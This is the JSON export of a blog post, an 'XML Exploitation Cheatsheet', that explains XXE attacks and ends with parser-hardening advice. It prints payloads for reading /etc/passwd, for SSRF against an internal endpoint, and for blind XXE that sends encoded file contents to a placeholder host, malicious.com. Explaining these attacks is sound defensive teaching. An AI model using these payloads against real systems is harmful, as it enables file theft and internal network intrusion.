{"id":4494,"date":"2024-12-06T17:53:07","date_gmt":"2024-12-06T22:53:07","guid":{"rendered":"https:\/\/dft.wiki\/?p=4494"},"modified":"2026-06-08T10:22:51","modified_gmt":"2026-06-08T14:22:51","slug":"xml-exploitation-cheatsheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=4494","title":{"rendered":"XML Exploitation Cheatsheet"},"content":{"rendered":"<p><strong>XML<\/strong> is a markup language like <strong>HTML<\/strong> and is widely used to store and transmit structured data. It consists of elements (tags), attributes, and character data. See example:<\/p>\n<pre>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n&lt;message id=\"1\"&gt;\r\n  &lt;to&gt;John&lt;\/to&gt;\r\n  &lt;from&gt;Mary&lt;\/from&gt;\r\n  &lt;heading&gt;Reminder&lt;\/heading&gt;\r\n  &lt;body&gt;Don't forget to call me!&lt;\/body&gt;\r\n&lt;\/message&gt;<\/pre>\n<p>The first line is the declaration and is not part of the structured data. The remaining lines define the static structure of a message.<\/p>\n<p>The problem begins when XML content is interpreted. What makes it dynamic also makes it dangerous.<\/p>\n<p><strong>XSLT<\/strong> (Extensible Stylesheet Language Transformations) is a language used to transform and format XML documents:<\/p>\n<ul>\n<li>An attacker can inject, modify, or extract sensitive data in XML documents.<\/li>\n<li>A crafted XML file can expand entities to reference external resources, leading to an XML External Entity (XXE) vulnerability.<\/li>\n<\/ul>\n<p><strong>DTDs<\/strong> (Document Type Definitions) define the structure and the allowed elements and attributes of an XML document.<\/p>\n<ul>\n<li>DTDs declare which entities and attributes are permitted, and are used to validate data integrity before processing.<\/li>\n<li>This feature can be abused using the <code>SYSTEM<\/code> keyword to reference external declarations such as file paths or URLs.<\/li>\n<li>In other words, it can allow malicious data or code injection. See examples below.<\/li>\n<\/ul>\n<p><strong>(1)<\/strong> Arbitrary file read:<\/p>\n<pre>&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt; &lt;!ENTITY xxe SYSTEM \"<strong>file:\/\/\/etc\/passwd<\/strong>\"&gt;]&gt;\r\n&lt;config&gt;\r\n&amp;xxe;\r\n&lt;\/config&gt;<\/pre>\n<p><strong>(2)<\/strong> Server-Side Request Forgery (SSRF):<\/p>\n<pre>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt; &lt;!ENTITY xxe SYSTEM \"<strong>http:\/\/localhost:8080\/internal-endpoint<\/strong>\"&gt;]&gt;\r\n&lt;config&gt;\r\n&amp;xxe;\r\n&lt;\/config&gt;<\/pre>\n<p><strong>(3)<\/strong> Blind XXE:<\/p>\n<pre>&lt;!ENTITY % cmd SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd\"&gt;\r\n&lt;!ENTITY % blind \"&lt;!ENTITY exfil SYSTEM '<strong>http:\/\/malicious.com\/?exfil=%cmd<\/strong>;'&gt;\"&gt;\r\n%blind;<\/pre>\n<pre>&lt;!DOCTYPE foo SYSTEM \"<strong>http:\/\/malicious.com\/attack.dtd<\/strong>\"&gt;\r\n&lt;config&gt;\r\n&amp;exfil;\r\n&lt;\/config&gt;<\/pre>\n<p><strong>XXE Vulnerability<\/strong><\/p>\n<ul>\n<li>In-Band\n<ul>\n<li>Allows data to be exfiltrated directly from the target.<\/li>\n<\/ul>\n<\/li>\n<li>Out-of-Band (Blind)\n<ul>\n<li>Requires additional resources to exfiltrate data, such as DNS queries or HTTP requests to an attacker-controlled host.<\/li>\n<\/ul>\n<\/li>\n<li>Denial-of-Service (DoS)\n<ul>\n<li>Attackers can cause a DoS by abusing entity expansion with excessively large or recursive entities.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><strong>Considerations<\/strong><\/p>\n<ul>\n<li><strong>XML Parsers<\/strong> should allow the minimum amount of content interpretation, since features like External Entities and DTDs can easily be misused.<\/li>\n<li>Prefer <strong>CSV<\/strong> or <strong>JSON<\/strong> (preferably JSON) over XML when possible.<\/li>\n<li>Vulnerabilities are typically the result of misconfiguration, poor coding practices, and insufficient restrictions.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>XML is a markup language like HTML and is widely used to store and transmit [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-4494","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/4494","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4494"}],"version-history":[{"count":9,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/4494\/revisions"}],"predecessor-version":[{"id":5618,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/4494\/revisions\/5618"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4494"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4494"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4494"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}